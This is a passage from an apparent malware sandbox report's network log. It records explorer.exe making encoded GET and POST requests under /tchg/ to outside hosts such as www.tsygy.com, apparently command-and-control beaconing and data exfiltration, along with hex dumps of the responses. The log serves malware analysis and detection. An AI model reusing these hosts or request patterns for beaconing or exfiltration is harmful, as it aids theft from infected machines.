                                                                                                                    Data Ascii: XRcHibEVyP0K5ZwLWLlTz2wtjUllQtFsu0mlNLI9BNcAYvlhW9MoX8shpaUuHL(UabcvuKD_UFOp5gF33FYJt-71FSxZhW(DFpN1vhWRKMHjBbjgc8gMW8FDYGHP~pyyAb1VjEPzGEQaByEU67VVUCmFprg-FkdBxqfVOUa5rKcfdoyoF9gr98rkJa4gWCpz5ceEPl594GeSnjvNsFMeCDdiqzyf~7XvIE261VuSs-cwOeTmIyQ
                                                                                                                    May 30, 2023 11:11:56.661648035 CEST1320INHTTP/1.1 403 Forbidden
                                                                                                                    date: Tue, 30 May 2023 09:11:56 GMT
                                                                                                                    content-type: text/html
                                                                                                                    transfer-encoding: chunked
                                                                                                                    vary: Accept-Encoding
                                                                                                                    server: NginX
                                                                                                                    content-encoding: gzip
                                                                                                                    connection: close
                                                                                                                    Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
                                                                                                                    May 30, 2023 11:11:56.661812067 CEST1331OUTData Raw: 43 32 50 53 28 30 78 35 61 49 63 53 52 4a 4e 6e 6e 6c 39 46 6d 73 4f 63 66 61 36 41 42 69 38 36 42 6d 46 6e 48 61 5a 37 43 4d 50 6c 58 4a 63 76 70 35 5a 74 43 38 34 50 75 78 56 4e 62 41 4e 6f 61 49 64 45 65 62 5a 47 67 67 6d 54 6c 77 4d 4b 79 4a
                                                                                                                    Data Ascii: C2PS(0x5aIcSRJNnnl9FmsOcfa6ABi86BmFnHaZ7CMPlXJcvp5ZtC84PuxVNbANoaIdEebZGggmTlwMKyJBySSFVdgV7rnk7evbQ1Pnm9c0Pw8Cegsv5oapf92OObj(wUMhJUx(xwPtbB8he4USe1dPGJc~_YJSUWLD3cOrHGDXtnN0mA6MRokObEqRF0LZ2qx4GnOvUaetJsAovqYJ7DtYCbcpoeDil~e9zJOZ0nz6O84WV1nc
                                                                                                                    May 30, 2023 11:11:56.672240019 CEST1332OUTData Raw: 32 77 35 65 69 6a 79 73 59 4d 6d 35 50 57 7a 35 6c 68 49 4c 58 4e 4e 52 47 53 6e 31 6a 30 36 51 34 6b 4d 36 6f 42 52 54 45 35 63 4f 6c 37 72 61 6a 61 56 68 4f 6b 37 75 6b 72 30 62 4f 50 75 4b 39 46 4a 4a 49 59 69 67 37 55 28 66 76 57 64 67 4d 75
                                                                                                                    Data Ascii: 2w5eijysYMm5PWz5lhILXNNRGSn1j06Q4kM6oBRTE5cOl7rajaVhOk7ukr0bOPuK9FJJIYig7U(fvWdgMuVzTkocKla0cvzNI6qEiO7850Q-jAax6yHzMqVwwegD8QSEBRfWYkBc8KE5xNMWZWyc11OMt9kxnI4ZQXC_Exp25zR2xXhptvvnyi5j~nIIv5g7QtxRRJMbDjQrsTS01Q8888l11Hveu_RjRfurC8Z3qE8rWbB3P81
                                                                                                                    May 30, 2023 11:11:56.672312975 CEST1336OUTData Raw: 68 4e 4f 4d 59 31 48 64 30 6e 54 56 79 72 4d 4b 4a 6a 6f 6c 69 4a 74 4b 57 62 76 6b 6b 37 66 79 4c 54 4c 6c 74 4c 4a 59 4b 65 51 6c 64 58 7e 6e 34 70 4b 79 31 57 7e 45 45 41 6e 45 71 65 6a 6b 38 32 75 77 68 57 6c 56 28 53 6a 54 61 6a 31 69 6b 6c
                                                                                                                    Data Ascii: hNOMY1Hd0nTVyrMKJjoliJtKWbvkk7fyLTLltLJYKeQldX~n4pKy1W~EEAnEqejk82uwhWlV(SjTaj1ikl5pE9vrZSnpp7fy3SiiFkvwER1Qkfs_tqGWHohWj9yfjFN32ObVETCEcwUCAsBgqkZtpH1dUNlBZzr5BmBMsda9DKPuluBm1cjSPfx_B5sKdKWS7_PRqLW6HfBx5bOhwLcZVL93Ux0AYpHCXPoMCQVRFiOXuoA89UC
                                                                                                                    May 30, 2023 11:11:56.672511101 CEST1345OUTData Raw: 54 51 6e 51 48 7a 79 6d 6c 69 34 4d 37 68 58 78 58 5f 28 38 65 4d 75 30 79 79 4f 4b 4c 32 6e 6d 4d 4b 4a 64 78 65 52 31 6c 7a 45 64 38 37 77 4e 45 34 7e 64 43 47 64 34 46 55 61 63 52 45 77 4b 33 61 36 6c 67 7a 61 48 64 5a 45 53 6b 67 51 79 69 47
                                                                                                                    Data Ascii: TQnQHzymli4M7hXxX_(8eMu0yyOKL2nmMKJdxeR1lzEd87wNE4~dCGd4FUacREwK3a6lgzaHdZESkgQyiG(_czbjHAs1J_nIVSb3t5UxcuyoZFt1dKvYW64hqnLlcs5GFa4rsdZevcY3jegxbflRsO45dzLGJt3WF3jRwH96MyFE1lGWUZ1jDinPLCb4o_Ck53fbLeMnMuNhjRUWF9lKFHChEsjpHOSuzWTo5CtBgqGaLYVFwcA


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    71192.168.11.204983091.195.240.4580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:59.180994034 CEST1346OUTGET /tchg/?O0qEM=Vh+NtSFYOkmwW/joH9vrd5+MSsdMnxV1ssl4yHjdHmi4FIifjhGRd3WP5FLf/k8P5fuqdVgOe83DA0NMx4WBp24AMjol/1MYCA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.marketing-solution.net
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:11:59.423235893 CEST1347INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 30 May 2023 09:11:59 GMT
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    transfer-encoding: chunked
                                                                                                                    vary: Accept-Encoding
                                                                                                                    x-powered-by: PHP/8.1.17
                                                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                    pragma: no-cache
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_G5prXlVdwTCD+r+fn7DUuR757YOPr2z5n7y9MQOfiVqPrUIsKJMYVD2ud92lbOMx/7OI0PCOIUgiaYOT9lauGw==
                                                                                                                    last-modified: Tue, 30 May 2023 09:11:59 GMT
                                                                                                                    x-cache-miss-from: parking-6bdbf848bb-z6z8f
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Raw: 32 43 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 47 35 70 72 58 6c 56 64 77 54 43 44 2b 72 2b 66 6e 37 44 55 75 52 37 35 37 59 4f 50 72 32 7a 35 6e 37 79 39 4d 51 4f 66 69 56 71 50 72 55 49 73 4b 4a 4d 59 56 44 32 75 64 39 32 6c 62 4f 4d 78 2f 37 4f 49 30 50 43 4f 49 55 67 69 61 59 4f 54 39 6c 61 75 47 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6d 61 72 6b 65 74 69 6e 67 2d 73 6f 6c 75 74 69 6f 6e 2e 6e 65 74 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 6d 61 72 6b 65 74 69 6e 67 20 73 6f 6c 75 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 72 6b 65 74 69 6e 67 2d 73 6f 6c 75 74 69 6f 6e 2e 6e 65 74 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20
                                                                                                                    Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_G5prXlVdwTCD+r+fn7DUuR757YOPr2z5n7y9MQOfiVqPrUIsKJMYVD2ud92lbOMx/7OI0PCOIUgiaYOT9lauGw==><head><meta charset="utf-8"><title>marketing-solution.net&nbsp;-&nbsp;Informationen zum Thema marketing solution.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="marketing-solution.net ist die beste Quelle fr alle Informationen die Sie suchen. Von
                                                                                                                    May 30, 2023 11:11:59.423347950 CEST1348INData Raw: 61 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e 20 62 69 73 20 68 69 6e 20 7a 75 20 73 70 65 7a 69 65 6c 6c 65 6e 20 53 61 63 68 76 65 72 68 61 6c 74 65 6e 2c 20 66 69 6e 64 65 6e 20 53 69 65 20 61 75 66 20 6d 61 72 6b 65 74 69 6e 67 2d 73
                                                                                                                    Data Ascii: allgemeinen Themen bis hin zu speziellen Sachverhalten, finden Sie auf marketing-solution.net alles. Wir ho1Fffen, dass Sie hier das Gesucht571e finden!"><link rel="icon" type="image/png" href="//img.sedoparking
                                                                                                                    May 30, 2023 11:11:59.423460007 CEST1350INData Raw: 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72
                                                                                                                    Data Ascii: (:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{
                                                                                                                    May 30, 2023 11:11:59.423527956 CEST1351INData Raw: 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75
                                                                                                                    Data Ascii: splay:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.containe
                                                                                                                    May 30, 2023 11:11:59.423626900 CEST1352INData Raw: 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70
                                                                                                                    Data Ascii: ck}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contac
                                                                                                                    May 30, 2023 11:11:59.423686981 CEST1354INData Raw: 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d
                                                                                                                    Data Ascii: tion:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display
                                                                                                                    May 30, 2023 11:11:59.423746109 CEST1355INData Raw: 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61
                                                                                                                    Data Ascii: lor:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-s
                                                                                                                    May 30, 2023 11:11:59.423818111 CEST1356INData Raw: 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65
                                                                                                                    Data Ascii: on:relative;max-width:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-
                                                                                                                    May 30, 2023 11:11:59.423872948 CEST1358INData Raw: 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69
                                                                                                                    Data Ascii: st__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-ele
                                                                                                                    May 30, 2023 11:11:59.423948050 CEST1359INData Raw: 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65
                                                                                                                    Data Ascii: link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoration:underline}body{margin:0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color:#949494
                                                                                                                    May 30, 2023 11:11:59.435136080 CEST1361INData Raw: 34 75 62 6d 56 30 4a 6d 46 66 61 57 51 39 4d 53 5a 7a 5a 58 4e 7a 61 57 39 75 50 56 49 31 62 6c 68 73 51 56 6c 6f 63 57 4e 79 4e 33 56 5a 5a 53 31 77 4e 45 35 59 4a 6e 52 79 59 57 4e 72 63 58 56 6c 63 6e 6b 39 4d 51 3d 3d 22 7d 2c 22 69 6d 70 72
                                                                                                                    Data Ascii: 4ubmV0JmFfaWQ9MSZzZXNzaW9uPVI1blhsQVlocWNyN3VZZS1wNE5YJnRyYWNrcXVlcnk9MQ=="},"imprintUrl":false,"contactUsUrl":false,"contentType":2,"t":"content","pus":"ses=Y3JlPTE2ODU0Mzc5MTkmdGNpZD13d3cubWFya2V0aW5nLXNvbHV0aW9uLm5ldDY0NzViZGRmMzFlNDczLjMyN


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    72192.168.11.204983123.104.137.18580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:04.620038986 CEST1408OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.tsygy.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.tsygy.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.tsygy.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 77 5a 70 44 62 4c 57 31 62 64 51 48 36 50 68 4a 62 4d 56 79 52 51 56 6e 55 31 62 64 64 77 65 50 43 33 70 34 4e 6a 70 30 72 49 57 42 76 43 39 55 68 2d 70 67 64 74 6d 7a 76 6b 79 33 51 66 48 50 4a 38 37 5f 55 36 32 7a 4a 44 4a 7a 33 72 75 46 6b 5a 53 47 6f 38 42 39 4a 67 68 39 4c 49 4b 41 6c 35 79 32 41 34 44 58 7a 55 69 5f 56 53 28 53 6e 57 6e 51 6f 6e 64 4e 4a 6f 6c 37 57 41 77 6f 74 66 57 78 44 4c 61 45 31 78 30 4e 56 70 44 7a 48 76 6f 42 57 33 6c 59 7a 68 6c 55 57 62 55 76 31 42 51 35 37 6a 76 39 7e 63 35 43 69 42 38 79 32 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=wZpDbLW1bdQH6PhJbMVyRQVnU1bddwePC3p4Njp0rIWBvC9Uh-pgdtmzvky3QfHPJ87_U62zJDJz3ruFkZSGo8B9Jgh9LIKAl5y2A4DXzUi_VS(SnWnQondNJol7WAwotfWxDLaE1x0NVpDzHvoBW3lYzhlUWbUv1BQ57jv9~c5CiB8y2A).
                                                                                                                    May 30, 2023 11:12:04.787960052 CEST1408INHTTP/1.1 200 OK
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                    X-Powered-By: Nginx
                                                                                                                    Date: Tue, 30 May 2023 09:12:02 GMT
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                                                                    Data Ascii: a
                                                                                                                    May 30, 2023 11:12:04.788219929 CEST1409INData Raw: 32 61 66 0d 0a c5 55 3f 73 d3 30 14 ff 2a c6 3d 48 7b d7 c4 92 25 39 96 9d 78 29 cc 30 74 61 74 6d 25 11 75 2c 63 2b 75 d2 91 8d a1 ac 2c 4c b0 74 68 cb c0 50 0e 8e eb 97 81 36 4c 7c 05 24 d9 40 da 2b 3d b8 eb 5d 3d f8 67 e9 fd fb e9 bd a7 e7 1f
                                                                                                                    Data Ascii: 2afU?s0*=H{%9x)0tatm%u,c+u,LthP6L|$@+=]=g>~5,5fy5'RuQOcRJ*h X`BFEU\z05zCO(1)op2@KI?8)lQ2l+dwMKSV%%/$%E?jd
                                                                                                                    May 30, 2023 11:12:04.788259983 CEST1409INData Raw: 38 0d 0a ee 6a 61 23 a4 06 00 00 0d 0a
                                                                                                                    Data Ascii: 8ja#
                                                                                                                    May 30, 2023 11:12:04.788291931 CEST1409INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    73192.168.11.204983223.104.137.18580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:07.303762913 CEST1410OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.tsygy.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.tsygy.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.tsygy.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 77 5a 70 44 62 4c 57 31 62 64 51 48 31 4d 70 4a 55 4e 56 79 46 41 56 6b 59 56 62 64 49 67 65 4c 43 33 56 34 4e 68 46 6b 72 36 79 42 75 69 74 55 67 5f 70 67 51 4e 6d 7a 6c 45 79 79 49 5f 48 55 4a 38 48 33 55 36 36 7a 4a 44 4e 7a 32 65 36 46 78 5a 53 5a 67 63 42 2d 41 41 68 38 42 6f 4b 61 6c 35 33 6e 41 35 6e 58 7a 6e 32 5f 55 51 58 53 6a 46 28 50 7e 33 64 4c 50 6f 6c 34 63 67 77 75 74 66 54 53 44 50 66 35 31 41 41 4e 56 49 6a 7a 45 76 6f 43 63 48 6c 62 7e 42 6b 56 61 4c 55 6d 37 67 67 69 36 51 7a 54 6d 2d 55 71 76 51 35 70 6d 79 54 59 68 6f 6d 72 42 43 6a 61 57 66 62 61 4b 52 70 78 36 62 54 2d 28 5a 59 78 4a 49 65 6a 76 77 75 49 70 4a 56 4f 33 31 6f 4b 28 50 55 42 4a 33 42 35 76 7a 77 5a 72 36 45 56 49 47 42 2d 42 38 46 58 6f 6d 28 50 6c 69 71 39 42 57 35 54 38 48 51 6f 70 42 49 6c 31 5a 67 66 36 49 6b 41 37 6a 72 5a 75 67 59 42 42 64 65 53 4e 6b 6b 46 6c 52 4e 74 4c 74 68 49 72 4c 43 4a 68 66 68 6d 72 45 70 59 31 6e 49 61 6f 32 66 5a 50 31 36 44 45 53 28 67 37 72 49 78 72 48 31 67 71 69 59 65 56 42 66 4d 71 39 28 6d 6f 63 64 71 52 49 44 31 79 4a 76 48 39 36 62 33 4e 78 32 41 32 73 77 69 47 6d 61 43 6b 4c 49 7a 77 39 5a 4c 36 30 56 72 38 75 61 35 47 31 31 49 75 51 78 56 66 58 62 54 5a 7a 73 78 47 58 75 50 53 2d 74 52 78 30 30 72 35 6f 4c 30 63 53 51 42 45 4e 4f 72 50 61 58 6e 49 6c 6d 77 6e 64 61 58 6f 6b 49 33 66 76 49 4b 4a 61 5a 30 6f 65 53 46 6e 42 37 6f 4b 7a 41 38 62 4e 6b 74 31 51 65 51 47 6b 37 50 74 33 48 66 39 36 45 78 6d 55 53 49 6e 54 30 53 75 70 30 66 30 69 45 78 30 49 34 4b 54 7a 6b 52 70 5f 5a 59 5a 4a 67 75 71 4e 55 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=wZpDbLW1bdQH1MpJUNVyFAVkYVbdIgeLC3V4NhFkr6yBuitUg_pgQNmzlEyyI_HUJ8H3U66zJDNz2e6FxZSZgcB-AAh8BoKal53nA5nXzn2_UQXSjF(P~3dLPol4cgwutfTSDPf51AANVIjzEvoCcHlb~BkVaLUm7ggi6QzTm-UqvQ5pmyTYhomrBCjaWfbaKRpx6bT-(ZYxJIejvwuIpJVO31oK(PUBJ3B5vzwZr6EVIGB-B8FXom(Pliq9BW5T8HQopBIl1Zgf6IkA7jrZugYBBdeSNkkFlRNtLthIrLCJhfhmrEpY1nIao2fZP16DES(g7rIxrH1gqiYeVBfMq9(mocdqRID1yJvH96b3Nx2A2swiGmaCkLIzw9ZL60Vr8ua5G11IuQxVfXbTZzsxGXuPS-tRx00r5oL0cSQBENOrPaXnIlmwndaXokI3fvIKJaZ0oeSFnB7oKzA8bNkt1QeQGk7Pt3Hf96ExmUSInT0Sup0f0iEx0I4KTzkRp_ZYZJguqNU.
                                                                                                                    May 30, 2023 11:12:07.471477985 CEST1410INHTTP/1.1 200 OK
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                    X-Powered-By: Nginx
                                                                                                                    Date: Tue, 30 May 2023 09:12:04 GMT
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                                                                    Data Ascii: a
                                                                                                                    May 30, 2023 11:12:07.471563101 CEST1411INData Raw: 32 61 66 0d 0a c5 55 3f 73 d3 30 14 ff 2a c6 3d 48 7b d7 c4 92 25 39 96 9d 78 29 cc 30 74 61 74 6d 25 11 75 2c 63 2b 75 d2 91 8d a1 ac 2c 4c b0 74 68 cb c0 50 0e 8e eb 97 81 36 4c 7c 05 24 d9 40 da 2b 3d b8 eb 5d 3d f8 67 e9 fd fb e9 bd a7 e7 1f
                                                                                                                    Data Ascii: 2afU?s0*=H{%9x)0tatm%u,c+u,LthP6L|$@+=]=g>~5,5fy5'RuQOcRJ*h X`BFEU\z05zCO(1)op2@KI?8)lQ2l+dwMKSV%%/$%E?jd
                                                                                                                    May 30, 2023 11:12:07.471618891 CEST1411INData Raw: 38 0d 0a ee 6a 61 23 a4 06 00 00 0d 0a
                                                                                                                    Data Ascii: 8ja#
                                                                                                                    May 30, 2023 11:12:07.471668005 CEST1411INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    74192.168.11.204983323.104.137.18580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:09.991215944 CEST1413OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.tsygy.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.tsygy.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.tsygy.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
